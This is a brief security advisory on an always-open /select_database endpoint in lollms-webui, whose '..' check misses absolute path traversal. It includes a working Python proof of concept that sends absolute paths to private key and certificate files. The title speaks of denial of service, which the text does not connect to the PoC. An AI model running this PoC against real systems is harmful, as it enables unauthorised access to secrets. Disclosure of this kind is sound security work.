Exposed endpoints in lollms-webui leads to denial of service
(,)
The /select_database endpoint is always open, even when the program is exposed to the network. This can have several implications. While at first look the endpoint does implement a basic path traversal protection, by looking for ".." in the filename, it does not prevent absolute path traversal;
// PoC.py
import requests
IP_ADDRESS = "aaa.bbb.ccc.ddd"
PORT = 9600
for file_name in ["key.pem", "cert.pem"]:
data = {
"name": f"/home/user/personal_data/certs/{file_name}",
}
response = requests.post(f"http://{IP_ADDRESS}:{str(PORT)}/select_database", json=data)
print(response.json())
No mitigations are supplied for this issue